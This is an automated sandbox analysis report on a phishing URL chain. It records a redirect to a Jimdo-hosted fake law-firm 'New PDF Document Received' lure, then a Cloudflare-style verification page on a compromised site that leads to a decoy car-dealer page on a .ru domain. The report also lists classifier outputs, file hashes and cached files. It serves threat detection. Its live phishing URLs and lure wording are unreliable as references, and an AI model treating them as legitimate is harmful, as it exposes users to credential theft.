Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.phis.win@22/40@54/267

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.185.78, 173.194.76.84, 34.104.35.123, 162.159.128.70, 162.159.129.70, 199.232.210.172, 104.18.41.38, 172.64.146.218, 142.250.74.195
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, fonts.jimstatic.com.cdn.cloudflare.net, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com, web.jimdosite.com.cdn.cloudflare.net
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.com

LLM Input / Output

Input	Output
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": true, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: URL: https://go.skimresources.com
URL: https://ys-law-firm.jimdosite.com/ Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "New PDF Document Received", "prominent_button_name": "View Document Online", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false }

URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: URL: https://ys-law-firm.jimdosite.com
URL: https://ys-law-firm.jimdosite.com/ Model: claude-3-haiku-20240307	```json { "brands": [ "YS LAW FIRM", "JIMDO" ] }
	```json { "brands": [ "YS LAW FIRM", "JIMDO" ] }
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: URL: https://www.primechoicefinance.com.au
URL: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41 Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Verifying...", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41 Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Success!", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41 Model: claude-3-haiku-20240307	```json { "brands": [ "Cloudflare" ] }
	```json { "brands": [ "Cloudflare" ] }
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: URL: https://carpetcleaningmanitoba.ca
URL: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41 Model: claude-3-haiku-20240307	```json { "brands": [ "Cloudflare" ] }
	```json { "brands": [ "Cloudflare" ] }
URL: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41 Model: claude-3-haiku-20240307	```json { "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Browse Inventory", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41 Model: claude-3-haiku-20240307	```json { "brands": [ "Vintage Motor Collectors - AutoShowroom" ] }

URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: URL: https://jimdosite.com

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 7 12:22:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.977476265584994
Encrypted:	false
SSDEEP:
MD5:	C8820C4234BDA7F9644FB7E62C2F19C3
SHA1:	BAFE40B4093731132DAE163C856FE7CACCC4C471
SHA-256:	82B33FE2C24835A00294D78C6C72575AAA7242B90A4A01AAD065E2CFAE4F0814
SHA-512:	E358A276293AADB64940AE5C1F8D809067E47FD7EA8C1A02AAE95E0B78E996CAF9CAF12837BF8D06FFC494645B38DDD9BA997D03E5D195219281027C02A9BE42
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....h...1..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.j....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgY.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 7 12:22:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9936640146076696
Encrypted:	false
SSDEEP:
MD5:	E6F53D50CACD701BC5C539A15136E710
SHA1:	AEA88E390B10B4E18484FED8BD6D532665A39AA1
SHA-256:	91860F7CDF54C2F0EE243934646C60D0AD35968F5C2BAC86E91FB4C773008835
SHA-512:	6739050D30209A8F2D4933F7BE4B3D73BD375DC4DB10CDAC9EF4CEFF4B36A426E0CE7F5A7A435CB1433AF002AF615E05C85065CCC6BC28AA7B1E757BEA4D07AE
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......~..1..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.j....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgY.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.003349088307484
Encrypted:	false
SSDEEP:
MD5:	A37DDD4D56359FF34E3939AF812F4691
SHA1:	153108643CCE41D863D53B6250D6BDFB9B5AF246
SHA-256:	9FCE41B543667BA3CCC91639966FB0CEAFE00F594B8564AFFB8842195951DA05
SHA-512:	D8ACD4FF0ADD56EB8E2793B117ECD2FD5C6080052A0A2B46C148C9E7885CD499FF8E138A200540AD96790CE1618CC01F56E028A45A9649450E8E1BB7D357AAC7
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.j....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 7 12:22:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.988030086836838
Encrypted:	false
SSDEEP:
MD5:	21C5F900A3191FEDBEEAF2ADE5CDE577
SHA1:	55F4CAE788F6B9A7DEAE6A54D9EF8C1BF89DE543
SHA-256:	D813617E701056D1649205051D9FA7122C8FAEE15D51994FC4860293C999A173
SHA-512:	AE7D3C426DCAFA50E8F36B81591A434277DD8DA766580AD385BAF5A57539A36EB99AF3910B8C6110A9B7036B5664616F0F10DACC53BD3327CC6A9D1510C96D71
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....A.r..1..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.j....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgY.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 7 12:22:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9828445297868043
Encrypted:	false
SSDEEP:
MD5:	8FE1C2BD5010DE024B3E9FE7C470D47A
SHA1:	6E292866F6F244336F2999662D0358BFD3009D72
SHA-256:	2B385A5127993B371C7B248A5325D3208D93131A510DFDDFCFA5785B845A7359
SHA-512:	6FAE38A1A4FEE91C93FFFE70D6C7306AEAD6CD90BC24AC0AE8B131736A8241669E5A7C6E869896895C140A9A9CA202BD52792D81E7F122DED8A241C620439892
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,........1..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.j....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgY.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 7 12:22:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.990184306318481
Encrypted:	false
SSDEEP:
MD5:	AF10FA322FEE79BFCDEC47629632FD8C
SHA1:	B4E462855B5A13C1B0E2B180491B79F897FA0270
SHA-256:	A445A6458478DE1A1033331EED691EEE54876E69FADB6D050E9F3EEDB97DA44D
SHA-512:	FEB006849471243B3228B6D4E37ADC84A2ADEECA4983CB293180E30F913469DE7FDC3229F81693A1C43484B06BFDE4940518CAB38AB115252895555105A7832F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....3.^..1..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.j....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgY.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 102

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x296, components 3
Category:	dropped
Size (bytes):	28725
Entropy (8bit):	7.932889208358125
Encrypted:	false
SSDEEP:
MD5:	0D14FE03673A02D30DB3524956A9C1FE
SHA1:	BA7EAE16EE890323B404326B27090A96460B9F95
SHA-256:	11CC211F161A820EACBEC4DD4F33306A943E639EC5F78B004D15FE168A71A9D3
SHA-512:	47903ED0FEDB34D91CE0764998455208C7C6647D3258F48F6F7E54D25CDE76FC610370A270AB00C8BEDF14F56F418E6F0F81968D5317738554E9B601620CC077
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.............BExif..MM........i................@........)..@....................C.......................................%..%....)).%756.2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......(...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......)....P[.:pi9<.t...w..7`m..i....Pvd...'....<}j<......y.H....{.s.....Y.g..z..n..c..jM...>...q..FU..........P.L.V..J.C.+...x..{>.O.]..D.Q..2...d..X.N;q..........o0r.&.ibR...x...}..1...=i..\.i$q..fs.@.d..... QN..V.@<.O...-..Xc%..g.u...... 9.Bzs..@.....(L`8...0;.H..........9c..?>.....H....1

Chrome Cache Entry: 104

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	7612
Entropy (8bit):	4.730535120632563
Encrypted:	false
SSDEEP:
MD5:	E7202BA7EFEE707D33B2C2012F7EE048
SHA1:	12232AF4FA6BE8B26BC13DE2D81C06486767D897
SHA-256:	6EF450DFF76FA4F6D97F241351E993DB93C9EFBAE15B18622A7519F0B3ABA336
SHA-512:	BA19C6BC466B9F381C9485CF07DCD9281D6F5D7E3D8D10461CA2CBF9EBBE5CD4378F7B3909A1ECD501FB52EF951CAC1C6F41BE5AFD96756EDC9360D7A56910B8
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Vintage Motor Collectors - freeisbeautifulo.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top">.. <div class="container">.. <a class="navbar-brand fw-bold" href="https://freeisbeautifulo.ru//">.. <i class="fas fa-car"></i> Vintage Motor Collectors - AutoShowroom.. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">.. <

Chrome Cache Entry: 105

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 160 x 29, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	6643
Entropy (8bit):	7.9363856114045594
Encrypted:	false
SSDEEP:
MD5:	FF8472E3BF43B21161820C66739E306C
SHA1:	85CA2B65F257F3F7E01A1DA6A3A315D831354781
SHA-256:	19AA2D8B099614802AB1DE769414E470FAF787B10DB41465B85BDB98DAE4278B
SHA-512:	A608125A20DF26CBD89E6D0EFA70FD4975BC5E76242718F49C24AD1E6469975969778F9049AA146153EF3612D731A9CFC00343A18A7C73CAEAA3CBC2B411154C
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.....................sRGB.........IDATh..zY.[.fDf..[..X;..b..,.-u..o..}.F....=}\|z.,.....)......pq.\"..@-.IszN/...N.."od,..._.~..>{o=....b.U+..P4..z"T.xB..$.DD..)0..G.?\|..l7/..%..vd.8..D............(..K..c0....r.....>\|M&._..UR%.f......`-..o.o-..'}%<.........V..@ff..@`.V..Xn.~7Q..x..S3......C.!X....8....1..d..v.&..5..03........"...2$.'...c.o..E.W.Mo{).Z..t. . 3L..<gx.\|......H.{-..F.....=......rP;...u...N.x......B_....M4M...b.7.....X~<..&..e..;..D.$.........2....i$.d..9.\.@.r,....z..+..W..9...b..}T.@..3O.q...D.{..C).m..6..7c).Z..........l...O.%........`.q..F..~.7..%nw...n......g..... ......Xy.....2.V...^.F.......-_.}-.......E~P......c.A 8...R0.."..Lf`G@.. .%...}...../B%...;..+.w..a.]M.._yo..@h...b.....Q+T..1(..... .........y.@.1.qI.<_.*........@hx..R..7Z7.C...c..p.YM.g.7G.7'...T.6~...........{g.'.\Q3...p..n.B....U4[.AM...3.....V.4.$4}...'.\vf.`$d.fff.<.Z...HNKz..J2...../@...?.....ZI .G.7......@jG.D....Q .../.t/[...^>...&.x............

Chrome Cache Entry: 106

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	4802
Entropy (8bit):	5.415883081641602
Encrypted:	false
SSDEEP:
MD5:	A90A2E5B9A3C097A815681A49DA9E6A1
SHA1:	1142CB363AB1A35E64546ED886CFD00B5093F504
SHA-256:	308FCE1E8CC31B982E8ED8A78A0729F7935F0056FDCE41483C59691B1339599E
SHA-512:	B006B37B8EBF9FFBF3291AB773CE36E6F8AC671FE63DF080596C102E5651CB7B12FDBE407645ACFF84101EDDD777564BED23B66B12EC10CFE30B6420643B58E8
Malicious:	false
Reputation:	unknown
URL:	"https://fonts.jimstatic.com/css?display=swap&family=Roboto:400,700"
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstat

Chrome Cache Entry: 107

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x257, components 3
Category:	downloaded
Size (bytes):	17527
Entropy (8bit):	7.911890498824977
Encrypted:	false
SSDEEP:
MD5:	91581B5F0AB45584C5741FF371D51F66
SHA1:	D2C34A164AF48EB81816D4697E2E4F685D1506D7
SHA-256:	9BE112870F24FA2C4C270F80CA32D35FFE2583C1FEA11BC0590DA1EA4D625906
SHA-512:	0667A903EB5334E82309819212F571931D217AD45EE74D21DB1F2C9D8A2A26F6336DAFA689FA56E783D98017F2F9C9C6EEC6031302BEECE1328CAB58CE19C86E
Malicious:	false
Reputation:	unknown
URL:	https://th.bing.com/th/id/OIP.wmwqkDvmBj-abekWqYJg-wHaEB
Preview:	......JFIF.............BExif..MM........i................@........a..@....................C.......................................%..%....)).%756.2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....i6.Z..ri6..+..`........6?...<.Z\.Z~.=.v?..q..........[{Qp...O..,....&..Hc4...R.....K..7......9..f..v-.sK.z.....}i.4..z]..T./..X....6....-..#...dx..v...K..P....,..PA..........9Y>..-F%.....&..=O.i..f8}h....=....D....z.......R.>...L.ap.........!..&..I...p..>..a...F...B...y..e.h.......i6.p

Chrome Cache Entry: 108

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	4762
Entropy (8bit):	7.920596603937304
Encrypted:	false
SSDEEP:
MD5:	ECE185FA42C195AEF27EF7C52D564C52
SHA1:	A4AC704B1209766CAB9614014FEFB3EAA05CB421
SHA-256:	82F34CD0034785B38484E38CDDFBEB974A8D10A6878EAD0DC99B4279AFF23B16
SHA-512:	03B1FF6B55871ED5CFE7130AE2242516ECBAEB200AFC88CF172BA8EBD2E4E70ED821DAE6139E9B59557EF6A4F87FE2E017F52D2963ACD83EDBB8C259A9E88330
Malicious:	false
Reputation:	unknown
URL:	"https://jimdo-storage.freetls.fastly.net/image/488638750/0e06a4c2-1fe1-481c-a49f-499af51bb739.png?quality=80,90&auto=webp&disable=upscale&width=160&height=29&trim=0,0,0,0"
Preview:	RIFF....WEBPVP8L..../....M0h...}/..g.O!..)w..p7.Y/.+dk...B...`.H.....;.{.%..HR.c..C..3.Q$IaDp......3........V.....S..q.!.....,.,..R..(..1..\..W...^..u.\..........Q.{.....a!.,\..s.v.qm`4.....;..\|.. .'...O.m.mt.V.sNX.N&...k....o..?.e...;....$A..4...b,...P.#I.m-.U....=..=..l.6...M....w..-I.%I.m!.zA?./...i....M.i.2%...e..j.Z.(...#gY3.(.:C....v...;.>U.E.3....z...).. ....d....... ..P..) .k..S...4....._.>.>_..i...t..D28......q..V\Gvy}.......P.....C....:.T.)2.K..>U:...S..@.;...1.S..s(U.NR9.E$.../N.j Y..t@:.....e..-....a....J..H39..>7s>3#..'...L..\|....._".0wYfu:.@J..s...8D.l.f.......:...{...S.(...H..4..4...k.......=qIA..G&.....*f..I.Y?.^W....E.."./.....dHMZ....U5..\|......^L.4..........R..:zI...p.x...]rF..H..CP....>..D.n.].J.il>..I...V.weK6.G2.=B...s........)7[.e....g....Wc..xA.t.X6.n.2m...).@.t..J.....65H..$=J%....E..f<8u...C.N..s...;q..Ns...~.mU...}..i.x5..r/)m...N...L...B.=..rvP.sE0..J.t.............M.8K..'...tV.....B.[V.j....W@.C..s.w.u.{/.kh.

Chrome Cache Entry: 109

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (1392), with CRLF line terminators
Category:	downloaded
Size (bytes):	2136
Entropy (8bit):	5.333778184113727
Encrypted:	false
